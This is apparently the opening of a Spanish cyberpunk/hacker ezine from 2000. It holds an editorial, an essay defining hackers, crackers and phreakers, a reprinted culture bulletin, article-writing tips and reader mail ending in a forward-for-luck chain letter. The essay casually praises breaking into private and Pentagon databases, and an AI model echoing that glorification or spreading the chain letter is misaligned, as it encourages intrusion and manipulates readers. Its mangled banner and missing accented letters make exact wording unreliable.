You are on page 1of 32

EEE E EEE E EEE

L L L L LLLLL

RRRR R R X X R R X X R R XXXXX R R X

XX

AAAAA A A AAAAA A A A A

NN N N N N N N N N NN N N ee

xxxxxxx xxxxxxxxxx xx xx xx xx xx xx xxxxxxxxxx xxxxxxx

X X XX XX XX XX XX XX XXXXX XX XX XX XX XX XX XX XX

FFFFFFFF F F F FFFFFFFF F F F F F

ee EEEEEEEE E E E EEEEEEEE E E E E EEEEEEEE

----------------------------------------------------------MAYO - JUNIO 2000: NMERO 7.

------------| CRDITOS | ------------REALIZADORES: SETH "ESENCIA DE MIRBANA" WATARU PRODUCTORES: U.C.C: Urban Cyberpunks Collective. COLABORADORES EN ESTE NMERO: Avinash Ivn Vzquez Caballero Dan PAGINAS WEB : (aki encontraras nuestras ediciones). http//:grancafe.webjump.com (pgina sub-oficial). http//:www.vanhackez.com CONTENIDOS CONTENIDOS 01. EDITORIAL CONTENIDOS CONTENIDOS CONTENIDOS -U.C.C CONTENIDOS

02. Estado Cyberpunk 03. Cybercultura al 100% 04. Aportaciones Hack 05. Un cortado, por favor 06. Instrucciones del lenguaje ensamblador 07. Hacerse invisible 08. Seguridad en Win2000 09. Ping 10. El Punto Final

-Avinash -Varios -Seth "EM". -Gran Caf -Ivn Vzquez Caballero -Seth "EM". -Wataru -DAn^ -Gran Caf.

CONTENIDOS CONTENIDOS

CONTENIDOS

CONTENIDOS

CONTENIDOS

CONTENIDOS

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ################ #01. EDITORIAL # ################

Bueno muchacho, otra vez aqu intentando daron la mejor cultura, la mejor informac in para vosotros por el bien de nuestras mentes. A partir de ahora el "Gran Caf" estar apoyado por la U.C.C (Urban Cyberpunks Colle ctive), un colectivo de Ciberpunks de Espaa que se dedican a lo que nosotros nos dedicamos: a dar la mejor informacin. Pero hay que decir que este grupo, que no es ningn colectivo hacker (ke nadie se confunda). Es ms bien un colectivo de personas individualistas que ofrecen no slo informacin. Tambin ofrecen su cultura, sus creaciones, sus experimentos... muchos de ellos ya metidos en este mundo de hace ya mucho tiempo. La UCC no tiene un nmero fijo de miembros ni colaboradores (yo soy un colaborador ), pero puedes encontrar a : A.S.Fonseka, Francisco Carrillo, Tanit, Dominike y otros cyberpunks... Que hace la UCC? No es sencillo. Son unos manifestadores de la propia cultura qu e intentan salvar el mundo de la ignorancia y la hipocresia. Algunos estn especia lizados en campos temticos y sus creaciones son simbologa de producciones y fruto de la mente: Culto a la Mente. Que realizan? Manifiestos. Actividades culturales. Performances. Msica. Literatura. Investigacin.

Tecnologa abierta para todos. Su lema: Tecnologa para todos (entre otros). As que damos la bienvenida a este nuevo grupo que se form el 10 de marzo de este m ismo ao. Habiendo dado signos de vida anteriormente. Un grupo nacido por la opresin del pas, la ignorancia y el odio al capitalismo que pretende acabar con nuestros bolsillos. Ahora han decidido ayudarnos en esta ez ine como fuente de conocimiento. As que probablemente, en cada numero a partir de ste, en el apartado "Editorial" demos noticias sobre sus creaciones culturales y otras. Empecemos ahora: UCC News: 909, despues de su tema "algunas makinas buenas", ke podeis encontrar probableme nte en mp3 en algunos sitios,ya que su tema es gratuito, ha decidido colaborar e n la UCC en la parte musical del grupo dando su soporte a las nuevas tendencias musicales y creaciones que la UCC pueda dirigir. Para ellos ha hablado A.S.Fonse ka con l intentando dirigir sto al xito. Bueno. Pos eso es todo en UCC News, en el prox. numero ms info. Ahora hablemos del "Gran Caf": Este numero ha sido de los ms dificiles de sacar por los examenes que teniamos. Y probablemente la numero 8 tambien tarde un poco mas de la cuenta. Ya ke esa fec ha es muy dificil encontrar tiempo para daros la mejor info. As que no os desespereis, la numero 8 llegar....paciencia. En el IRC podeis encontrarnos en el canal #gran_cafe del IRC hispano. Algunos se rvers del IRC hispano: irc.redestb.es; irc.iddeo.es... En el canal se hablan temas comentados de los numeros ke se han publicado, para intercambiar informacion y para planificar los proximos numeros... hasta se expl ican cosas... Si tienes una pgina web con nuestra ezine publicada puedes enviar ahora un mail a chuky666@hotmail.com y entrars en nuestra lista de links. Wataru informa: Tras convocar varias huelgas, los internautas espaoles han ideado una nueva herramienta para atacar a las operadoreas donde mas les duele, en sus beneficios. Se llama Comebanners 1.0 y es un programa que impide ver la publicidad de las operadoras telefonicas presentes en cualquier paguina web asi como tadoa la expuesta presente en sus portales. A su vez, hace que reciban un mensaje de que su publicidad no sera visionada a no ser que se ofrezcan tarfas planas en sus ofertas comerciales en la Web. Para el futuro se pretende actualizar el programa para filtrar aquellos banners y anuncioas que se vayan considerandodignos de serlo. La distribucion de Comebanners 1.0 esta siendo llevada a cabo por la sociedad de internautas, desde cuya paguina web (www.internautas.org) los usuarios podran bajarselo. Esta asociacion pide tarifa plana de acceso 24 horas por 3.000 pesetas al mes, de 8 a 20 horas por 2.000 pesetas y de 20 a 8 horas por 1.000 pesetas.

nada mas, solo deciros que ningun autor de los textos que vienen a continuacion se hace responsable del mal uso ke hagais de la informacion. As que cuidadito con

lo que haceis...... @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ####################### #02. Estado cyberpunk # ####################### ----------------------------------EsTaDo CiBeRPuNK--------------------------------------------by: aViNash "Estado ciberpunk" es un trmino que debe ser acuado para tratar de globalizar y ex plicar lo ciberpunk como un proseso de evolucin hacia la cibercultura.Es encontra r el equilibrio hombre mquina partiendo de un sentimiento radical, que se llena a lgunas veces de angustia, otras desencadenan pasiones y en el medio, la entrada a una nebulosa de feelings donde cada tomo gaseoso se transforma en un bit digital y cada grupo de bits en una at msfera que acoje a los placeres de la tecnologa, sus morbos, o en su defecto resue lve los impedimentos a travs de la simulacin. Estado ciberpunk, es un termino que tiene varios significados. En primer lugar, expone todo lo relacionado con el aspecto "fisico", donde el ciberpunk es algo q ue entra por los sentidos, se ve, se toka y se oye. Se trata de visualizar la te cnologia, el futuro y sus aplicaciones en un "estado fisico ciberpunk": la ropa,la musica, el arte, etc., lo que sea represen tar materialmente este sentido. Por otro lado, el "estado" significa "estado mental" o "doctrina" y esta constit uido por las ideas, postulados, etc., representadas por todas las personas que t ratan de explicar estos fenomenos tecnologicos, realizando ensayos o simplemente transmitiendolo en los medios de comunicacion; es aquello que conforma lo inmat erial y filosofico de este aspecto. El tercer objeto ciberpunk es considerar a este "estado" como punto de reunion y convergencia de los dos anteriores. Es decir, se ha creado un estado referente a un "sitio" o "espacio" en el que las personas se relacionan con ideas, cosas, etc. y en mayor medida con la "informacion". El concepto de "estado ciberpunk" s e da en dos lugares o ambitos: - Un sitio real y fisico, ya sea en solitario (programadores, artistas, escritor es, divulgadores, o aficionados a la estetica ciberpunk) para despues mostrarlo ante la gente por medio de fiestas, exposiciones, mesas redondas, actividades se minarios, etc. - Un sitio virtual y telematico, donde a traves de la realidad virtual y las red es de comunicaion ( en mayor medida ambas conectadas, como ocurre en los muds) s e permite acceder a otro estado de esencias soportadas en el ciberespacio. Por ultimo se puede considerar el termino komo "nacion" o "nueva sociedad" por d os motivos: En primer lugar porque el ciberpunk es un nuevo estilo de vida, que alberga dist intos sentidos,distintas reglas sociales, etc. Algo ha cambiado, y en ese cambio se evidencia el nacimiento de una nacion sin fronteras fisicas, desapareciendo paulativamente lo internacional por la idea de "Aldea Global" ( termino utilizad o cada vez con mayor frecuencia, acuado por Marshall McLuhan). En segundo lugar, si agruparamos a toda la gente relacionada con el ciberpunk, s

e podria formar un nuevo estado constituido por millones de personas. Seria un i nteresante experimento (desde los 40 millones de conexiones a internet, a las 49 revistas ciberpunks, unas 240 emagazines, unos 180 newgroup de usenet, mas de 2 50 escritores considerados ciberpunks, alrededor de 45 peliculas de cine, unos 2 3 programas de television, 25 videos, mas de 60 tiendas de ropa y utensilios ciberpunk. --------------------------------------LoS CiBeRPuNKS-----------------------------------------Debieramos distinguir entre los ciberpunks del movimiento social y los ciberpunk s del movimiento tecnologico. Komo se apuntaba antes, existen dos espacios para el desarrollo de este movimiento: uno fisico y otro en el ciberespacio. Esto significa que partiendo de un mismo sentimiento entre los grupos ciberpunks , cada cual lo expresa con sus propios medios y caracteristicas, quedando refle jada esa conducta en uno u otro espacio. El MoViMieNTo SoCiaL: esta formado por aquellos que se identifican con los aspectos sociales del ciber punk, kon los personajes de estas novelas y con ese sentido de la vida al que se podria llegar. No es necesario ser un experto en tecnologia. La informacion nos llega a traves de los medios de comunicacion de masas, conociendo de esta maner a espontanea y disvirtuadamente el sentido. Por ejemplo, un dia vemos en la tele gente en una discoteca vestida con atuendos raros, que nos recuerdan a la pelicula "Blade Runner" (considerada obra de cult o del ciberpunk) y un reportero les pregunta por su forma de vestir; ellos les r esponden comentandole las doctrinas futuristas de toda la "movida" ciberpunk. A todos nos llama la atencion porque hay algo de cierto en esos contenidos. Kon el tiempo la movida se extiende entre mas gente y este foco social se amplia . Por otro lado el MoViMieNTo TeCNoLoGiCo va llegando a mas hogares. El ordenador personal se conecta a un modem y la persona puede acceder a datos en lugares dis tantes. Expertos y aficionados a la informatica descubren un mundo en las redes, y a med ida que lo conocen lo van transgrediendo. Consiguen entrar en las bases de datos del pentagono o en cualquier sitio privado, digno de ser investigado. Todo ello inesperadamente va relacionandose con aquel mundo descrito por la nueva generac ion de escritores de ciencia-ficcion. Comienza a ser un movimiento. Lo menos es meterse, lo importante es que esta ocurriendo y que hay que pensar e n las posibles consecuencias. Con este desarroyo, el sentimiento dezcrito camina la denominada "subcultura", h acia el UndErgrOUnd. -SuBCuLTuRa en el ambito social.Bajo este entorno se unen en una serie de tribus que se agrupan de la siguiente manera: RAVERS--: viene del verbo ingles to rave, significando delirar, desvariar o estar desencad enado. Como nombre sirve para designar "juerga", e incluso a veces puede tomar e l sentido de colera. Los ravers son los usuarios y participantes de la rave. Lo rave se encuadra en todo lo que se genere por ordenador y tenga cierto aire psicodelico. El termino que funde ambos conceptos es lo "ciberdelico". Principalmente se asocia a fiestas (tambien reuniones, actos, etc.), en las que se realizan actividades relacionadas con la tecnologia, destancando la musica si ntetizada y alternativa, arte generado por ordenador(sonidos y formas que despie rten algo nuevo o un sentimiento). Existe una vacilacion en el termino rave que se despliega en dos sentidos. Uno es el rave mas radical referido al diseo de drogas sinteticas, fiestas de sex o y sitios llenos,poko control, etc.

(neopunk, neohippy..).Y el otro expresa un sentido menos extremo y de busqueda e stetica, bebidas sanas (las smart drinks o bebidas inteligentes de contenido vit aminico, etc.), o entorno especificos ciberpunk. -SuBCuLTuRa en las autopistas de la informacion. Son los magos de comunidad info rmatica. Hay unos grupos especificos identificados como ciberpunk y son: HaCKeRS: el nombre viene del verbo ingles to HaCK, cortar, acuchillar, destrozar. Son per sonas con grandes y profundos conocimientos de como funcionan los ordenadores. O peran en la red telematica y son capaces de burlar los codigos de acceso a los n odos de informacion privada. Para ello la informacion a de ser libre y como tal tratan de acceder "acuchillando" los impedimentos que puedan haber en la red. CRaKeRS: del verbo to CRaCK, romper, partir, resquebrajar. A diferencia de los hackers, s u objeto es destrozar los sistemas informaticos y crear el caos en las redes, ya sea pos obtener beneficios de forma ilicita o por el mero placer de asesinar lo s datos.En la ficcion ciberpunk se les conoce como "cowboys de consola". (molaaaa ;) ) PHReaKeRS: del verbo to FReaK, que significa "hacer el viaje" (freak out, hacer el viaje to mando droga). Como nombre, freak es espcimen raro, un fenomeno o algo estrafalario. Es similar a los anteriores solo que esta vez el sistema al que acceden son las redes telef onicas. "Friquean"las redes de tal forma que burlan a las compaias telefonicas ha ciendo llamadas gratis, intervienen las redes con astutos trucos como la utiliac ion de las denominadas "Box" (cajas que simulan las frecuencias de las lamadas p or telefono). CYPHeRPuNKS: del verbo CiPHeR, cifrar, codificar, poner en clave. Dentro del entramado de las redes informaticas, los cypherpunks tratan de abolir "los sistemas" logicos de salida de datos. Es como una proteccion de la identidad. Ellos difunden el uso d e combinaciones y esquemas codificados que sean dificiles de romper o traspasar a traves de la criptografia y de los criptosistemas (codificaciones especificas de datos). Quieren crear "regiones de seguridad" para que nadie los invada ni pu edan acceder a sus datos (por ejemplo el PGP, pretty good privacy, es un sistema en el solo un emisor y un receptor concreto de una red pueden decodificar los m ensajes y acceder a ellos. Bueno me parece que con este pequeo escrito dejo bastante claro algunas cosas que muchos de ustedes no teniais ni puta idea, algo de cybercultura nunca viene mal ;) . si teneis alguna pregunta o quereis decirme algo avinash@soluciones.interbook.ne t ciao. @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ########################### # 03. CYBERCULTURA AL 100%# ########################### C I B E R C U L T U R A

======================= Nmero 5 - (16-28 Febrero de 1999) Boletn quincenal sobre cultura digital. Subscripciones, nmeros atrasados e informacin: http://www.web.sitio.net/faq/cibercultura ------------------------------------------------

Intro. TV: aburrido panorama. Globaldrome versin 3.0 Derecho e informtica Entrevista a DJ Krush Tecnologa e Internet. Enfocando desde varios ngulos. Lleg para quedarse. La historia del IRC FAMSF. Ms arte en la red Una nueva sociedad del ciberespacio. Mtete en la Cibercultura

TV: aburrido panorama --------------------Llevamos ms de medio siglo aguantando la tirana de los medios de comunicacin de masas, especialmente de la TV. Est tan dentro del entramado social que incluso pasa desapercibida y ha calado tan hondo en nuestras vidas que es una ms de la familia. Habla todo el da sin dejarnos responder, nos ensea a vestirnos, a vivir, educa a nuestros hijos, se levanta y acuesta con nosotros y no se calla ni a la hora de comer. Su constante ronroneo se nos ha hecho tan familiar que ya ni siquiera lo notamos. Pero, por desgracia, sigue afectndonos. El principal problema en este asunto es la propia naturaleza del medio. La TV es un medio unidireccional, donde unos pocos elaboran la informacin y muchos se la tragan sin posibilidad alguna de rplica. La dictadura catdica nos obliga a la pasividad creando en muchos espectadores el adormecimiento del espritu crtico. Esta situacin llega a su mxima expresin cuando los programadores de las distintas cadenas elijen su producto a base de repetir hasta la saciedad los resortes ms manidos a la hora de convocar masas: amplificacin del escndalo, sensacionalismo gratuito y emotividad artificial. Sera candoroso pensar que Internet es la alternativa a la TV. Pero a pesar de sus carencias, Internet es una de las propuestas ms serias, inteligentes y claras a la hora de gastar nuestro tiempo. La ventaja que ofrece Internet al posibilitar que seamos nosotros los que vayamos a la informacin y no al revs y que exista la posibilidad de que todos los usuarios puedan crear y difundir contenidos son motivos de mucho peso para ir pensando en un cambio de costumbres. Pero en caso de dudas no lo piense dos veces, apague la tele y el ordenador. El espectculo que a diario ofrece la naturaleza

y el contacto humano directo dista aos luz de las recreaciones ms o menos realistas que puedan hacer la TV o la realidad virtual. Son el mejor ejercicio para combatir el aburrido panorama meditico que nos invade. Antonio Montesinos a.monte@jet.es Nota: A propsito de esto se puede consultar el "Manifiesto contra la telebasura" que han elaborado varias asociaciociones y que hace meses que circula por Internet: http://www.web.sitio.net/faq/textos/0021_telebasura.txt Globaldrome versin 3.0 ----------------------------Finalmente est ya en la red la nueva versin de nuestro website Globaldrome. La red no est precisamente exenta de cruentas luchas comerciales. La fastidiosa batalla Netscape/Microsoft consigui hacer imposible poner javascripts compatibles con los navegadores. En una primera fase de globaldrome apostamos por el Netscape 4.0, que al menos era de cdigo abierto, pero lo cierto es que Gates ha vencido la batalla y el Internet Explorer est cada vez ms extendido. As pues, como no queremos renunciar a ofrecer una interface activa y creativa, para esta nueva versin nos hemos decantado por una pgina manimalista en el que los cdigos de software -retocados- son el elemento decorativo principal. Los cdigos javascript estn pensados para el netscape 4.0 pero en su nuevo formato, cualquier usuario con cualquier navegador puede en principio acceder a la pgina y obtener la informacin. Quizs algunos usuarios pierdan algn juego sutil con javascript, pero la informacin est toda ah, perfectamente accesible para cualquiera.

Derecho e informtica --------------------La red es apasionante en s misma. Analizar uno a uno los factores que la hacen as sera una tarea rdua y requerira largo tiempo. Uno de esos factores es sin duda la posibilidad de replicar documentos sin prdida y diseminarlos sin lmites espaciales conservando al mismo tiempo su calidad. Esta facilidad ha hecho que la informacin hoy, ms que nunca, se encuentre muy disponible y que copiarla y moverla sea tan fcil como hacer clic con el ratn. Esta posibilidad trae de cabeza a los defensores de las leyes de propiedad intelectual que estn viendo como se violan, a veces para bien a veces para mal, estos derechos de una forma en la que es muy difcil luchar contra estas prcticas. Sin entrar en la defensa ni el ataque a ninguna postura en relacion a este asunto (que cada uno acte como mejor crea), lo cierto es que nunca est dems conocer lo que dice nuestro sistema legal al respecto. Cuando menos es interesante estar informado. Para ello nos hemos encontrado con la pgina web "Informtica y Derecho", elaborada por Manuel Porras (mpq@ctv.es). A l se le pueden

dirigir consultas sobre estos temas y en sus pginas se recoge informacin variada para saber un poco ms sobre lo que estamos haciendo cuando movemos informacin por Internet. http://www.ctv.es/USERS/mpq/principal.html

Entrevista a DJ Krush ------------------------Aprovechando la visita este fin de semana del reconocido DJ japons DJ Krush a Barcelona, ofrecemos esta interesante entrevista que forma parte de un proyecto ms general "Let the DJ be the writer" que esperamos ir ofreciendo desde globaldrome, as como otros materiales del mundo de la msica electrnica. En general, las entrevistas a Djs se limitan a citar cuatro influencias y narrar un par de ancdotas sobre drogas y raves. Por el contrario, esta entrevista a DJ Krush contiene suficientes elementos tericos de peso para que pueda atraer no slo al aficionado sl techno, sino al interesado por la relacin entre tecnologa y cultura en general. http://www.globaldrome.org/entrevistas/krush.html

Tecnologa e Internet. Enfocando desde varios ngulos ----------------------------------------------------Siempre es un ejercicio de frescura mental contemplar la realidad desde diversos puntos de vista. Conformarnos con la versin "oficial" de las cosas es ver la vida desde donde nos la quieren vender o simplemente quedarnos con su cara visible. Si hay algo evidente en nuestros das y que requiere una revisin exhaustiva es la presencia de la tecnologa en nuestras vidas. El impacto de Internet como medio de comunicacin emergente est generando una serie de ideas preconcebidas que no estara mal analizar de la manera ms objetiva posible. En un artculo titulado "Internet, tecnologa e individuo: una visin integradora", Antonio Montesinos reflexiona desde distintas perspectivas sobre algunos de los conceptos que han llegado con la red de redes, como son: 1.- Internet es una red global 2.- La posibilidad de trabajo en equipo facilita la disponibilidad de recursos gratuitos. 3.- Internet es fuente de pornografa e informacin delictiva. 4.- Internet es el futuro y cambiar drsticamente nuestra forma de enfrentarnos al mundo. 5.- El auge de la tecnologa crea ciber-analfabetos. Los que no sepan manejar un ordenador tendrn grandes problemas en el futuro para integrarse en la sociedad.

Todos estas afirmaciones tienen su cara y su cruz, sus luces y sus sombras, sus verdades y mentiras. Contemplar todos sus matices en su verdadera dimensin nos ayudar a hacernos con una visin ms global y precisa de lo que tenemos entre manos. Artculo completo: http://www.web.sitio.net/faq/textos/0034_integracion.txt

Lleg para quedarse. La historia del IRC ---------------------------------------Las charlas en directo por Internet utilizando el teclado son relativamente recientes. Tienen tan solo una dcada, tiempo ms que suficiente para demostrar su potencial como una de las formas de comunicacin ms apasionantes que ofrece la modernidad. Se podran escribir pginas y pginas sobre todo lo que rodea al chat (bueno y no tan bueno, por supuesto). De lo que no cabe duda es de su caracter abierto, democratizador, libre y annimo. Como intesante es el fenmeno en s, interesante es tambin su historia. Curiosamente, el IRC (junto al WWW) es un invento europeo. Si los estadounidenses fueron los padres de Internet y de la mayora de sus herramientas, en el viejo continente se han forjado dos de sus servicios ms utilizados. El IRC nace en Finlandia (al igual que Linux) y gracias a la guerra del golfo se extiende en masa a otros pases. Hoy conversan a diario por este sistema decenas de miles de personas. La historia de este invento es algo poco difundido en Internet. La poca informacin que existe son los relatos de su creador, Jarkko Oikarinen. En esta direccin tienen en espaol una breve historia de la forma de entretenimiento ms adictiva de la red. http://www.web.sitio.net/faq/textos/0006%20Historia%20del%20IRC.txt

FAMS. Ms arte en la red -----------------------Son las siglas de Fine Arts Museums of San Francisco. (Museos de Arte de San Francisco). En nuestra bsqueda de contenidos artsticos y culturales en Internet nos hemos topado con esta pgina. Se trata de un museo virtual con miles de imgenes de pintores de todos los tiempos que se pueden encontrar gracias a un sencillo motor de bsqueda. El sistema incorpora el proyecto ZOOM, por el que se ofrecen las imgenes en distintos tamaos sin prdida de calidad para

que visualicemos el que ms nos interese. As dice su texto de presentacin: "El proyecto ZOOM es una colaboracin entre los Fine Arts Museums (Museos de Arte) y el Departamento de Informtica de la Universidad de California en Berkeley. El objetivo es proporcionar imgenes de alta resolucin con mltiples niveles de ZOOM. El almacenamiento y disponibilidad de estas imgenes lo proporciona un sistema de tres terabytes que est siendo desarrollado por el Tertiary Disk Project en California." Pgina principal en: http://www.thinker.org/imagebase/index-2.html

Una nueva sociedad del ciberespacio ------------------------------------------Hace tres aos, John Perry Barlow liber a la red un famoso texto, traducido a muchos idiomas, conocido como "Declaracin de Independencia del Ciberespacio". El texto fue realmente muy influyente y planteaba la idea de Internet como una "utopia" en el sentido ms literal posible: un mundo ideal que realmente no pertenecera al espacio material terrqueo. El Martn, colaborador habitual de global drome, analiza en este artculo hasta qu punto ese mundo ideal es posible y, si en realidad, es tan deseable como Perry Barlow nos lo pintaba. Podis leer el artculo completo en http://www.globaldrome.org/textos/ciberrights/cibersociedad.html

Mtete en la Cibercultura ------------------------Te lo estamos poniendo a tiro. Tienes las puertas abiertas (en Internet siempre lo estn, al menos de momento). La informacin, la comunicacin, la cultura, las redes... es cosa de todos. Internet creci con el trabajo de miles de usuarios del mundo entero y sigue siendo as. La colaboracin ha obrado y sigue obrando "milagritos" tecnolgicos que hacen que la tecnologa no sea algo tan fro. Este boletn, al igual que gran parte de Internet, es algo abierto y flexible. Sintete parte de l y utilzalo no slo para leerlo, sino para forjarlo. Cualquier aportacin relacionada con la cibercultura puede ser parte suya. Si eres alguien que cree que tiene algo que aportar te lo estamos ofreciendo: enva cualquier colaboracin a una de estas dos direcciones de correo. cibercultura@esgratis.net da5id@jet.es

Nuestra pgina web es: http://www.web.sitio.net/faq/cibercultura

--CIBERCULTURA, 1999. Se permite la reproduccin y distribucin de estos contenidos siempre que sea con fines no comerciales y citando la fuente. Para otros usos consultar a los editores. Cibercultura es una publicacin independiente elaborada por los propios usuarios de Internet. Para colaborar con nosotros solictelo en la siguiente direccin de correo electrnico: cibercultura@esgratis.net Cibercultura est coordinada por: Antonio Montesinos (a.monte@jet.es) y David Casacuberta (da5id@globaldrome.org) Pgina web de CIBERCULTURA para nmeros atrasados, subscripciones e informacin variada: http://www.web.sitio.net/faq/cibercultura Pginas web relacionadas directamente con CIBERCULTURA: Alejandra http://www.web.sitio.net/faq Globaldrome http://www.globaldrome.org FrEE http://www.arnal.es/free Gracias especiales al servicio de hosting http://sitio.net por la cesin gratuita de direcciones de correo y espacio para pginas web. @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ########################## # 04. Aportaciones Hack # ########################## Este es un minidocumento sobre textos hack. Bueno, ya llegamos otra vez, un poco cansados, pero con ganas. Aki estoy con mi caf, leyendo, escribiendo, construyendo sueos... y me falta tiemp o, me faltan horas al da para estudiar, trabajar, leer, estar con los colegas, co nectarme, preparar un caf, aprender informtica por mi propia cuenta, hacer algo de electrnica...la novia, ke no se me olvide... Pero, puedo hacer todo esto??? Lo hago. Desde ke sali el texto hackkit.txt en 1997 las ezines y dems textos sobre hack han sido favorables para nuestro desarrollo, un desarrollo unico... y es que muchos admins y empresas dedicadas al sector nos deben las gracias. Gracias a nosotros la informatica se ha superado, gracias a nosotros los sistemas son mas seguros, hay mas competencia, hay ms, hay ms, mucho mas, y todo esto nos lo deben a nosotr os, a los hackers. Porke nos gusta la informatica, las telecomunicaciones y apre

ndemos sobre ellos, tal vez con un punto de vista que pocos conocen, pero sin em bargo aprendemos... por eso existen los textos: fruto de las investigaciones per sonales de cada uno, y ke a mi pesar, nos gusta compartir conocimientos. Este texto va enfocado a akellos que buscan, comparan, escriben y quieren aporta r algo de conocimiento. Otros lo hacen para ser recnocidos dentro de la escena, y me parece muy bien...me la suda. Pero otros lo hacen porke kieren ese conocimi ento y kieren compartirlo... Bueno, pues aki se va a explicar como hacer un buen texto de hack. Para akellos ke empiezan a escribir sus articulos: 1. Un texto debe estar implementado y argumentado en otras fuentes para tener la s ideas claras de lo ke se tiene ke escribir. 2. Al empezar un texto se debe mirar bien el orden, un indice. Sino la gente pue de entender mal el texto. 3. Despues del indice se tiene que realizar una introduccion del tema o del text o. Ambos a parte mejor. 4. Esa intro se debe explicar paso a paso en ke konsiste el tema. Ke sea breve y explicativo. 5. Para haber un orden mas exacto, antes de explicar realmente el tema se debe c onocer la tecnica ke se va a utilizar y explicar como va. Siempre hay muchos ke se pierden y deben repasar. 6. Despus se aplica lo que realmente se va a explicar de forma terica. 7. Y hace falta luego una parte prctica esquemtica. De tal manera que te explike b ien lo que se tiene que hacer paso a paso. 8. En la parte practica tiene que haber pausas explicativas, para un mejor domin io de la tecnica. Nada mas compaeros, solo deciros esto. Realmente es bueno saberlo para hacer un b uen articulo de hack o parecido. Esperamos vuestros articulos.... chuky666@hotmail.com @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ################################### # 05. Un cortado, por favor # ################################### El espacio de todos est aki, en este apartado. Ya sabes, si kieres escribirnos cr iticarnos, apoyarnos, etc... escribe a wataru@olemail.com Si kieres escribir un articulo hazlo a chuky666@hotmail.com Bueno, y aki vienen los mensajes de algunos: ---------------------------------------------------------------------------cut here... ---------------------------------------------------------------------------Mantra Hind Mi amigo abri el cajn de la cmoda de su esposa del que sac un paquetito envuelto en papel de seda: Esto, dijo, no es un simple paquete, es lencera . Tir el papel y obser v (a seda y el encaje. Compr esto la primera vez que fuimos a Nueva York, hace 8 0 9 aos. Ella jams lo utiliz. Quera conservarlo para una ocasin especial. Pues bien... creo que es justamente un buen momento . Se acerc a la cama y aadi la preciosa prenda a otros objetos que las pompas fnebres se Ilevaran. Su mujer acababa de fallecer.

Girndose hacia m, dijo: No guardes nada para una ocasin especial; cada da que vives es una ocasin especial . Siempre pienso en estas palabras... Han cambiado mi vida. Hoy, leo mucho ms que a ntes y limpio menos mi casa. Me siento en la terraza y admiro el paisaje sin pre star atencin a las malas hierbas del jardn. Paso ms tiempo con mi familia y menos tiempo trabajando. He comprendido que la vi da es un conjunto de experiencias que hay que apreciar. Ya no conservo nada. Uti lizo mis copas de cristal todos los das. Me pongo mi nueva chaqueta para ir al su permercado si me entran ganas de Ilevarla. Ya no guardo mi mejor perfume para lo s das de fiesta, lo utilizo desde que tenga ganas. Las frases del tipo un da... y un da de stos... estn siendo apartadas de mi vocabular Si ello vale la pena, quiero ver, or y hacer las cosas ahora. No estoy del todo seauro de io que habra hecho la mujer de mi amigo si ella hubiera sabido que ya n o estara maana, un maana que nos tomamos todos a la ligera. Creo que hubiera Ilamad o a su familia y a sus amigos ntimos. Quizs hubiera Ilamado a algunos de sus antig uos amigos para hacer las paces o disculparse por una vieja querella. Me gusta pensar que quizs hubiera ido a comer a un restaurante chino (su cocina p referida). Son estos pequeos detalles sin cumplir que me enervaran mucho si supier a que mis horas fueran contadas. Estara contrariado por no haber visto ms a alguno s de mis amigos que deba volver a contactar un da de estos... , contrariado por no ha ber escrito esas cartas que tena intencin de escribir un da de stos, contrariado por no haber expresado a menudo mi amor a los seres queridos. Ahora no aplazo nada, no rechazo ni conservo nada que pudiera aportar alegra y ri sas a nuestras vidas. Tengo en mente que cada da es especial... cada da, cada hora , cada minuto es especial... Si recibes este mensaje es que alguien desea el bien para ti y porque t tambin, po r tu lado, tienes gente a la que quieres. Si ests demasiado ocupado para tomarte algunos minutos para enviarlo a otros y que piensas que lo enviars un da de stos ... e so est lejos... quizs no lo hagas nunca... Este mantra viene del norte de la India . Seas o no supersticioso, tmate algunos minutos para leerlo. Vale? Contiene mensaje s buenos para el alma. Es un Ttem Mantra que da suerte. Este Ttem Mantra que te es enviado. Ya ha dado la vuelta al mundo al menos 10 vec es, si no ms. Instrucciones para la vida: 1 Come mucho arroz integral. 2 Da a los dems ms de lo que esperan y hazlo con gusto. 3 Memoriza tu poema preferido. 4 No te creas todo lo que oyes, no gastes todo lo que posees y no duermas tanto como te gustara. 6 Cuando digas te amo , dilo con seriedad. 7 Cuando dices lo siento , mira a la persona en los ojos. 8 Permanece de novio al menos 6 meses antes de casarte. 9 Cree en el amor a primera vista. 10 No te burles de los sueos de los dems. 11 Ama profunda y apasionadamente. Puede que resultes herido pero es la nica form a de vivir la vida. 12 En caso de desacuerdo, s leal. No te ofendas. 13 No juzgues a los dems a travs de entorno. 14 Habla lentamente pero reflexiona rpidamente. 15 Si alguien te hace una pregunta a la que no deseas contestar, sonre y pregntale : Por qu quieres saber? 16 Recuerda que el amor ms grande y los ms grandes xitos conllevan riesgos mayores. 17 Llama a tu madre. 18 Dile salud al que estornuda.. 19 Cuando pierdes, no pierdas la enseanza. 20 Recuerda las 3 ERES : respeto para contigo mismo, respeto a los dems, responsabil idad de tus actos. 21 No permitas que una pequea desavenencia rompa una gran amistad.

